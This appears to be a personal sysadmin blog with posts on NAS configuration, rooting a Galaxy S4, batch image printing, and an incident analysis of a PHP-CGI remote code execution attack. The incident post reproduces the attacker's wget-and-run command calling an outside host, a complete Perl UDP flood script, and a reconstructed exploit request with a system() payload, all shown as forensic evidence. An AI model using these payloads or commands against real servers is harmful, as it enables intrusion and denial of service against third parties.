After creating these scripts, run /opt/editconfig.sh and add the following at the end of the <Group Level="2"> section of the opened file:

<Group Level="2">

    ..... Other Program defs .....

    <Program Name="CustomInitScript" Path="sh">
        <Args>/opt/init-opt.sh</Args>
        <SysOption Restart="-1"/>
    </Program>

</Group>

After these modifications, you can place all your startup scripts into /etc/rc.local, which will be executed after you reboot.

svcd Performance Tweak

svcd is some sort of indexing service that tends to take up a lot of CPU. We can renice it though.

Since we now have access to sohoProcs.xml (see previous section), we can set the Nice level in there.

Run /opt/editconfig.sh, find the entry for svcd and add the Nice attribute:

<Program Disable="0" Name="Svcd" Path="/usr/local/svcd/svcd">
        <SysOption MaxMem="96M" Nice="19" Restart="-1"/>
</Program>

Connecting to package (ipkg) repositories

LifeLine Linux distro in this NAS is based on NSLU2-Linux, so we can make use of their resources.

Open /etc/ipkg.conf and add the following:

src cross http://ipkg.nslu2-linux.org/feeds/optware/cs08q1armel/cross/unstable
src native http://ipkg.nslu2-linux.org/feeds/optware/cs08q1armel/native/unstable

Then update the package lists:

root@ix2-dl:/# ipkg update

MySQL Installation

root@ix2-dl:/# ipkg install mysql5

This will install MySQL and dependencies into /opt (aka /mnt/system/opt), but the permissions will be wrong so the server won’t start after installation. You need to follow these steps:

  • Add mysql user through the Web Console
  • Fix permissions
root@ix2-dl:/# chmod o+w /opt/var
root@ix2-dl:/# chown -R mysql /opt/mysql-test
root@ix2-dl:/# chown -R mysql /opt/var/mysql
  • In /etc/passwd change home directory for ‘mysql’ user to /opt/var/mysql
  • Setup environment
root@ix2-dl:/# su - mysql
mysql@ix2-dl:/# vi .bashrc

Add the following:

export PATH=$PATH:/opt/bin
  • Start MySQL. As root:
root@ix2-dl:/# /opt/share/mysql/mysql.server start
Starting MySQL..
  • Configure the server. Follow the wizard and change the root password.
root@ix2-dl:/# su - mysql
mysql@ix2-dl:/# /opt/bin/mysql_secure_installation
  • Log in:
root@ix2-dl:/# su - mysql
mysql@ix2-dl:/# mysql -u root -p
Enter password: *****
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.88 optware distribution 5.0.88-1

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| lib                | 
| log                | 
| mysql              | 
| test               | 
+--------------------+
5 rows in set (0.00 sec)
  • To start the server on reboot, open /etc/rc.local and add:
# Start MySQL server
/opt/share/mysql/mysql.server start

Note: This last step will only work if you followed instruction in the “Custom Boot Scripts” section.

You are done!

Importing the Wiki Database

mysql@ix2-dl:/# mysql -u root -p
mysql> create database wikidb;
mysql> CREATE USER 'wiki'@'%' IDENTIFIED BY '********';
mysql> GRANT ALL PRIVILEGES ON wikidb.* TO 'wiki'@'%';
mysql@ix2-dl:/# mysql -u wiki -p wikidb < wikidb-db-backup.sql

Daily Backups of the Wiki Database

The wiki database is backed up and versioned with RCS daily. Here is the setup:

  • Install RCS:
root@ix2-dl:/# ipkg install rcs
  • Backup script (/opt/var/mysql/mysqlbackup.cron.sh):
#!/bin/bash

# DATABASE DEFINITION SECTION
# Database specified with a "dbname user password" triple
databases=("wikidb wiki ******")
# END DATABASE DEFINITION SECTION

WD="/nfs/backups/wiki"
MYSQLDUMP="/opt/bin/mysqldump"
CI="/opt/bin/ci"
AWK="/usr/bin/awk"

numdb=${#databases[@]}

cd $WD

for database in "${databases[@]}"; do
 db=$(echo $database   | $AWK '{print $1}')
 user=$(echo $database | $AWK '{print $2}')
 pass=$(echo $database | $AWK '{print $3}')

 filename=${db}-db-backup.sql

 echo "Backing up database $db..."
 $MYSQLDUMP -u $user --password=$pass $db > $filename 2> MY_SQL_DUMP_ERROR_$db
 if [[ $? -ne 0 ]] ; then
   # The backup has failed. Send a notification e-mail
   #
   echo "WIKI BACKUP FAILURE!"
 else
   # Success. Delete the error file if any and check in the new backup into RCS
   #
   echo "Creating an RCS version for $db..."
   rm MY_SQL_DUMP_ERROR_$db > /dev/null 2>&1
   export TMPDIR=$WD
   echo . | $CI -l -d"`date`" $filename
 fi

done

Cron Job

/etc/cron.daily/mysql_backup:

#!/bin/sh
/opt/var/mysql/mysqlbackup.cron.sh

Credits

http://vincesoft.blogspot.ca/2012/01/how-to-run-program-at-boot-on-iomega.html
http://iomega.nas-central.org/wiki/Hacking_(Home_Media_CE)
http://www.nslu2-linux.org/
http://techmonks.net/installing-transmission-and-dnsmasq-on-a-nas/

SSH access to Lenovo ix2-dl NAS

Tuesday, 25 Feb 2014

Posted by valblant in NAS


I recently purchased the Lenovo ix2-dl NAS, b/c it was time to upgrade my storage capacity and I did not want to deal with my current setup anymore. My datahost box runs LVM on top of software RAID 1, on Slackware 10.2, with 5 drives in the machine :).

I was attracted to the Lenovo ix2-dl, b/c it is small, quiet, provides RAID 1 and costs $90 at Tigerdirect, which is significantly cheaper than any other NAS I came across.

This NAS box has a 1.5GHz ARM Feroceon 88FR131 processor, 256MB of RAM and runs LifeLine Linux, which is a distro developed by Iomega’s parent company EMC, specifically to power their NAS boxes.

The only concern I immediately had with the ix2-dl, was the lack of SSH access to the box. A Linux box w/o SSH access is extremely irritating, so I decided to research this further.

Enabling SSH Access

Turns out that there is a hidden Diagnostics page available in the web interface at /manage/diagnostics.html. This page allows the user to set an SSH port and root password. The catch is that the selected password is prefixed with the word ‘soho‘. So if you select ‘GOD’ as your password on the page, the actual password is ‘sohoGOD‘. Once logged in, you can change the password to whatever you want with the ‘passwd’ command.

Once you log in, you can work with the drives, software raid, Apache, NFS, etc. just like you are used to on any Linux box.

Credits

Most of the information was obtained from here: https://blog.liftsecurity.io/jon-lamendola

 

Step By Step Guide to Rooting your Galaxy S4 (SGH-I337M) from Ubuntu

Thursday, 16 Jan 2014

Posted by valblant in Android


Tags

android, galaxy s4, root, ubuntu

This guide was written by experimenting with the Canadian (Telus) version of Galaxy S4. If you have a different phone, this guide can still be useful for understanding the principles behind the process – you’ll just need to make sure that you get the right bootloader image for your phone.

I am assuming that you are using a Linux computer in this guide.

Before We Begin

The strangest and most stressful thing that happened to me during this process is when the key combination for booting the phone into Recovery mode stopped working. Normally we boot into Recovery by turning off the phone and holding down Vol Up & Home & Power buttons. This worked fine for a while, and then suddenly stopped working. If this happens to you check out the Troubleshooting section below for a solution.

Install ClockworkMod (CWM) Recovery Bootloader

  • Install firmware flash utility that speaks the Odin protocol (Samsung’s proprietary firmware flash software)
	sudo add-apt-repository ppa:modycz/heimdall
	sudo apt-get update
	sudo apt-get install heimdall
  • Download koush’s ClockworkMod Recovery image: http://download2.clockworkmod.com/recoveries/recovery-clockwork-touch-6.0.4.4-jfltecan.img. If you have a different phone, select the image from here: http://www.clockworkmod.com/rommanager.
  • Power off the Galaxy S4 and connect the USB cable to the computer, but not to the Galaxy S4 yet.
  • Now boot the Galaxy S4 into download mode by holding down Vol Down & Home & Power. Accept the disclaimer. After this insert the USB cable into the device. Your phone is now ready to flash a new Recovery bootloader via the Odin protocol.
  • On the computer, open a terminal in the directory where you saved the recovery image and run the following command (use the filename of the image you actually downloaded):
    sudo heimdall flash --RECOVERY recovery-clockwork-touch-6.0.4.4-jfltecan.img --no-reboot

    A blue transfer bar will appear on the device showing the recovery image being transferred.

  • Turn off the phone
  • Boot the phone again by holding Vol Up & Home & Power. If you find that your phone just keeps rebooting instead of going into CWM Recovery, please read the Troubleshooting section for a solution.
  • CWM Recovery will present you with a text menu that you can navigate with the Volume keys, and select with Power key. Select the first option: “Reboot System Now”
  • The Galaxy S4 now has ClockworkMod Recovery installed!

Backup the Stock Image

This is a good time to make a backup of your entire phone, just in case you need to get back to the stock configuration later. DO NOT SKIP THIS STEP!

  • Reboot back into CWM Recovery by holding Vol Up & Home & Power during startup.
  • Go to “backup and restore” -> “backup to /sdcard”. This will take a while, so just wait. At the end of this process, your backup will be stored in “/mnt/shell/emulated/clockworkmod/backup/” on the phone’s file system. You can’t access that from your phone directly yet, but you can use “adb pull” (https://developer.android.com/tools/help/adb.html) to transfer it to your PC, as shown below. You’ll also be able to do it easily after we finish rooting the phone, so there is no need to do that now.
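
For example, pulling the whole backup directory with adb looks something like this (the timestamped directory name here is made up; list /mnt/shell/emulated/clockworkmod/backup/ first to see the real one):

$ adb pull /mnt/shell/emulated/clockworkmod/backup/2014-01-16.10.15.32 ./s4-stock-backup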

Rooting The Phone

  • Download the ROM update, which will introduce the necessary changes for rooting your Galaxy S4: http://download.clockworkmod.com/superuser/superuser.zip

NOTE: I had a lot of trouble with this ROM as of November 29th, 2013. The author told me that he’ll fix it, so it is likely that you will not experience any problems now. However, if you find that you follow the instructions, yet your phone is not getting rooted, see the Troubleshooting section for a solution.

  • Copy “superuser.zip” into the root of your phone’s internal file system (by that I mean what the phone shows you as a root – in reality the root directory you see from the phone is actually mounted here: /mnt/shell/emulated/0). There are many ways to do this, such as mounting the phone over USB, over the network, using adb, etc. There are many tutorials out there that show you how to copy files from your computer to your phone.
  • Shut down again. Boot into CWM Recovery by holding Vol Up & Home & Power.
  • Navigate to “install zip from sdcard” -> “choose zip from sdcard” -> “0/”. You will find your ‘superuser.zip‘ here. Select it and confirm.
  • You’ll get some text at the bottom and a Success message. Click ‘Back’ and select ‘Reboot’
  • Your phone is now rooted! See next section for making sure that everything worked correctly.

Confirming Correct Operation

  • You should have a new app installed called Superuser. This is where you can configure how other apps get access to root, as well as see the log of apps that requested root.
  • Download an app called Root Checker: https://play.google.com/store/apps/details?id=org.freeandroidtools.root_checker
  • Use the app to make sure that root access is granted. If it isn’t see the Troubleshooting section.

Install ROM Manager

ROM Manager is an extremely useful app that makes a lot of the operations we just did possible from a single click. It will also manage your backups, keep your CWM Recovery install up to date, and keep track of new ROMs, so you should install it:
https://play.google.com/store/apps/details?id=com.koushikdutta.rommanager

Remember that backup we took in the beginning from CWM Recovery? Go to “Manage and Restore Backups”, and you’ll see your backup in the list. Select “Download Backups”, and you’ll be offered a download link to transfer your backup to your PC for safe keeping.

Troubleshooting

Recovery Boot Loop

Many S4 owners have a problem with their phones going into an endless loop of restarts when trying to boot into Recovery Mode.

Do the following: with your phone off, press and hold the VOLUME UP and POWER buttons at the same time. Do not let go when the little message appears in the upper-left corner of the screen; keep holding until the actual recovery options appear. If the phone goes into another restart without the options appearing, just keep holding VOLUME UP until the recovery menu finally shows up.

superuser ROM failing to root the phone

I had this problem after downloading http://download.clockworkmod.com/superuser/superuser.zip on November 29th, 2013. Although it is very likely fixed now, the fact that you are reading this section suggests otherwise, so let’s give this a try.

First, let’s take a look at exactly what changes superuser.zip ROM makes to the file system in order to root the phone:

  1. Replacing the ‘su‘ binary with one that has some added functionality, and that has the setuid bit [http://en.wikipedia.org/wiki/Setuid] set on it. This is what allows apps to elevate privileges (a quick check for this is shown after the list).
  2. An Android app that acts as a front end to ‘su‘, and keeps track of which apps are allowed to use it, and which ones are not.
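
A quick way to verify the first point after flashing is to look at the installed su binary over adb; the ‘s’ in the permission bits is the setuid bit (assuming the usual /system/xbin/su install location):

$ adb shell ls -l /system/xbin/su
-rwsr-sr-x root     root          ...       su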

It appears that on Galaxy S4 (Canadian) with Android 4.2+ installed, there have been some kernel changes that make the seteuid system call fail like this:

 seteuid (root) failed with 13: Permission denied

You can see this message if you use adb logcat while trying to elevate privileges.

As a result of this error, the phone does not get rooted. This problem is easy to fix, but it requires some code changes. There is some detailed info about this problem and the fix for it here: https://github.com/koush/Superuser/issues/196

The problem for me was that the official version of superuser.zip has not yet been updated with the fix for some reason. In any case, I have taken the patch from GitHub and updated the ROM. You can get the fixed version here: http://vace.homelinux.com/unprotected/superuser/fixed-superuser.zip

Follow exactly the same steps with this file as described above and everything should work out.

 

I just got PWNED by “PHP 5.x Remote Code Execution Exploit”

Thursday, 05 Dec 2013

Posted by valblant in Uncategorized


Today my home server dropped off the net, thus cutting me off from all of my tunnels and email services for the entire day. Upon returning home, I found that the reason for this outage was a UDP flood ping that was originating from my server, and consuming 100% of my CPU and 100% of my bandwidth. Further inspection showed that my Apache 2.2 server running on Lucid Lynx was hacked. In this post I’ll document the steps I took in order to figure out and fix the problem.

Initial Observations

After logging in to my server I ran the top command and found that a perl process was taking up all of the CPU.

root@gatekeeper:~# ps -axf
19914 ?        S      0:00 sh -c cd /tmp;wget 146.185.162.85/.../u;perl u 154.35.175.201 6660 500
19918 ?        R    506:21  \_ perl u 154.35.175.201 6660 500
19916 ?        S      0:00 sh -c cd /tmp;wget 146.185.162.85/.../u;perl u 154.35.175.201 6660 500
19922 ?        R    506:12  \_ perl u 154.35.175.201 6660 500

These processes were owned by www-data user, which is the Apache user on Ubuntu.

Sure enough, the mysterious ‘u’ file being executed by perl was there:

root@gatekeeper:~# cd /tmp; ls -l
-rw-r--r-- 1 www-data www-data   1089 2013-12-04 11:53 u
-rw-r--r-- 1 www-data www-data   1089 2013-12-04 11:53 u.1

The contents of the file:

root@gatekeeper:~#  cat u
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0   <time>\n";
 printf "if arg1/2 =0, randports/continous packets.\n";l
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1];
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

This script initiates a UDP flood of the provided address, in this case 154.35.175.201:6660. Note that although the $time argument schedules a “killall -9 udp” to stop the flood after 500 seconds, the process here is running as “perl u” rather than “udp”, so the kill never matches anything and the flood runs until it is stopped by hand.
The malicious script was downloaded from here: http://146.185.162.85/…/. Note that this directory contains a whole bunch of interesting malicious code, including an IrcBot and a PayPal phishing page.

So, definitely h4x0red. But how?!?!?

Attack Analysis

  • Ran last -i, to see if there were any logins besides the ones I expect to be there. Nope.
  • Checked the timestamp and contents on /etc/passwd. Nope.
  • Checked for suspicious entries in /var/log/syslog and /var/log/auth.log. Nope.
  • Downloaded ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz to scan for any known root kits. Nope.

It appears that Apache2 was the attack vector, especially since the permissions on the downloaded files belong to www-data user.

Check our CGI configuration:

root@gatekeeper:~# vi /etc/apache2/sites-enabled/000-default
      ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
      <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
</Directory>

Check what we have in /usr/lib/cgi-bin:

root@gatekeeper:~# ls -l /usr/lib/cgi-bin
lrwxrwxrwx 1 root root      29 2012-04-22 18:57 php -> /etc/alternatives/php-cgi-bin
-rwxr-xr-x 1 root root 7836616 2013-09-04 14:22 php5

Check the logs around 2013-12-04 11:53 timestamp, since this is when the ‘u’ file was downloaded into /tmp. I could not find an exact match in /var/log/apache2/access.log, but there was a lot of interesting stuff in there:

46.16.169.53 - - [01/Dec/2013:11:38:50 -0600] "POST //%63%67%69%2D
%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63
%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%
66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3
D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73
%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%
65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%7
0%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65
%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%
72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%7
4%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%6
9%6E%70%75%74+%2D%6E HTTP/1.1" 504 508 "-" "-"

WTF is that?! Writing a quick Ruby script to decode:

#!/usr/bin/ruby

input="%63%67%69%2D%62%69%6E/%70%68%70%35?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E"

input.split('%').each {|c|
	if ( c.length == 2 )
		print c.hex.chr
	elsif (c.length == 3)
		print "#{c[0..1].hex.chr}#{c[2].chr}"
	end
}

We get the following:

//cgi-bin/php5?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d
+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n

Taking a look at /var/log/apache2/error.log we see scary stuff like this:

[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] --2013-12-04 11:57:22--  http://146.185.162.85/.../u
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] Connecting to 146.185.162.85:80...
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] connected.
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] HTTP request sent, awaiting response...
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] connected.
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] HTTP request sent, awaiting response...
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] 200 OK
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] Length: 1089 (1.1K)
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] Saving to: `u'
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170]
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170]      0K
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] .
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170]
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] 100% 26.8M=0s
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170]
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] 2013-12-04 11:57:22 (26.8 MB/s) - `u' saved [1089/1089]

ok, so whatever this does, it obviously somehow exploits the php5 executable. We are not supposed to be able to run php5 directly (b/c php5 binary is compiled with force-cgi-redirect enabled: http://fi2.php.net/security.cgi-bin), yet this somehow bypasses that security.

And here’s the explanation of how the exploit works:

On Debian and Ubuntu the vulnerability is present in the default install
of the php5-cgi package. When the php5-cgi package is installed on Debian and
Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
the binary because this binary has a security check enabled when installed with
Apache http server and this security check is circumvented by the exploit.
When accessing the php-cgi binary the security check will block the request and
will not execute the binary.
In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
check is done when the php.ini configuration setting cgi.force_redirect is set
and the php.ini configuration setting cgi.redirect_status_env is set to no.
This makes it possible to execute the binary bypassing the Security check by
setting these two php.ini settings.
Prior to this code for the Security check getopt is called and it is possible
to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
-d switch. If both values are set to zero and the request is sent to the server
php-cgi gets fully executed and we can use the payload in the POST data field
to execute arbitrary php and therefore we can execute programs on the system.
apache-magika.c is an exploit that does exactly the prior described. It does
support SSL.
/* Affected and tested versions
PHP 5.3.10
PHP 5.3.8-1
PHP 5.3.6-13
PHP 5.3.3
PHP 5.2.17
PHP 5.2.11
PHP 5.2.6-3
PHP 5.2.6+lenny16 with Suhosin-Patch
Affected versions
PHP prior to 5.3.12
PHP prior to 5.4.2
Unaffected versions
PHP 4 - getopt parser unexploitable
PHP 5.3.12 and up
PHP 5.4.2 and up
Unaffected versions are patched by CVE-2012-1823.

This explanation was obtained from: http://www.exploit-db.com/exploits/29290/

So with this information, I gather that the full exploit looked something like this:

POST //cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: vace.homelinux.com
Connection: keep-alive
Content-Length: 78
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.97 Safari/537.22
Content-Type: application/x-www-form-urlencoded

<? system("/tmp;wget 146.185.162.85/.../u;perl u 154.35.175.201 6660 500"); ?>

I was not able to recreate the exploit with this exact request, so there must be some additional details required to make it work, but I am fairly certain that this is the general mechanism that was used to carry out the attack.

Securing The Server

Lucid is a fairly old distro, so I did not want to deal with upgrading the php package. I am sure it would be dependency hell. Instead, I followed the advice given on this thread (http://www.howtoforge.com/forums/showthread.php?t=63740&page=3) and installed mod_security.

There are good instructions on how to do that found here: http://www.linuxlog.org/?p=135

One thing to note is that if you are using Lucid, you will not be able to install the latest ModSecurity rules (v2.7.5), so don’t download those. Instead use the link provided in the article.

Here’s my /etc/apache2/conf.d/modsecurity:

<ifmodule mod_security2.c>
  SecRuleEngine On
  SecDebugLog /var/log/apache2/modsecurity.log
  SecDebugLogLevel 3
  SecAuditLogParts ABIJDEFHZ

  # For testing: http://vace.homelinux.com/?test=MY_UNIQUE_TEST_STRING
  SecRule ARGS "MY_UNIQUE_TEST_STRING"\
  "phase:1,log,deny,status:503"

  # These are too noisy with warnings, so turning them off
  SecRuleRemoveById 960032
  SecRuleRemoveById 960034

  Include /etc/apache2/mod_security_rules/*.conf
</ifmodule>
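
To confirm that the rules are actually live, hit the test URL from the config above and check that the request is rejected with the 503 configured in the test rule:

$ curl -s -o /dev/null -w '%{http_code}\n' 'http://vace.homelinux.com/?test=MY_UNIQUE_TEST_STRING'
503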

Conclusion

Since I was not able to recreate the exploit, I am not 100% sure if this solution worked. I’ll keep my eye on the logs over the following weeks and I’ll post here again if there are any unexpected developments.

Printing Many Images of Fixed or Variable Size in Linux

Tuesday, 08 Oct 2013

Posted by valblant in Uncategorized


Tags

image processing, printing

I thought I’d share some things I learned recently after having to format and print hundreds of images automatically. I’ll discuss printing images of the same size, as well as printing images of different sizes.

The most difficult step in the process is to format the image on the page. This is very easy to do manually by using OpenOffice, for example, but how do you do it from command line to hundreds of images?

Images of Fixed Size

  • Open Inkscape and import a test raster image. It doesn’t matter what image you choose, as long as its dimensions match the dimensions of your target images.  Position the image on the page as you desire.
  • Save the image as drawing.svg. Then open drawing.svg in a text editor and replace the image’s file path with the placeholder string IMAGE_NAME, since the script below substitutes each target image’s path for it.
  • In the directory where you saved your SVG, create a subdirectory and place all your target images there.
  • In the same subdirectory create a script called generate_pdf.sh:
#!/bin/bash

rm *.svg
rm *.pdf

DIR=`pwd`

for i in `find . -iname "*jpg" -o -iname "*png"`; do
  SVG_NAME=${i%.*}.svg
  PDF_NAME=${i%.*}.pdf
  IMG_NAME=${i#./}
  cp ../drawing.svg $SVG_NAME
  sed -i "s,IMAGE_NAME,$DIR/$IMG_NAME," $SVG_NAME

  inkscape --without-gui --export-pdf=$PDF_NAME $SVG_NAME
done
  • Run the script, and it will generate an SVG and a PDF file for each image.
  • Print all PDF files:
$ IFS=$'\n'; for i in `find . -iname "*pdf"`; do echo $i; lpr -P printer_name $i; done

You can find out the name of the printer by running this command:

$ lpstat -d -p

Images of Variable Size

The easiest way I found is to use ImageMagick.

$ convert -rotate "90>" -page Letter *.jpg test.pdf

Then open test.pdf and print all pages. Be sure to check each page before printing, since you may need to print a couple of images manually.
